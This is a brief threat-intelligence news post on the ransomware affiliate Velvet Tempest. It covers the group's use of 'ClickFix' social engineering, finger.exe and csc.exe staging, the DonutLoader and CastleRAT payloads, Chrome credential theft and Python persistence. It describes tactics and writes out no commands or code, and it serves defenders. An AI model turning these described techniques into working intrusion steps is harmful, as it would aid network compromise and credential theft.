Velvet Tempest (DEV-0504), a prolific ransomware affiliate associated with high-profile groups like Ryuk and LockBit, has been observed leveraging the "ClickFix" social engineering technique to breach corporate networks. This method involves tricking users into pasting obfuscated commands into the Windows Run dialog, which initiates a chain of execution using native system tools.
The threat actor utilizes legitimate Windows utilities such as finger.exe and csc.exe to stage payloads, including DonutLoader and the CastleRAT backdoor. During a 12-day observation by MalBeacon, the group performed Active Directory reconnaissance, credential harvesting from Chrome, and established persistence using Python-based components within the ProgramData directory.
While Velvet Tempest is frequently linked to Termite ransomware and double-extortion attacks, this specific campaign highlights their evolving tactics for initial access and lateral movement. The use of user-assisted command execution and living-off-the-land techniques continues to pose a significant challenge for modern security infrastructures.
Top comments (0)